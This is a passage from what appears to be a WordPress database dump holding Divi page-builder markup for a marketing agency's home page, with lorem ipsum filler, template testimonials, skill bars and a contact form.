custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|1px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|-5px|56px|21px||\" custom_padding=\"|0px||10px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:05:35','2020-07-09 20:05:35','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(294,1,'2020-07-09 20:33:51','2020-07-09 20:33:51','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row 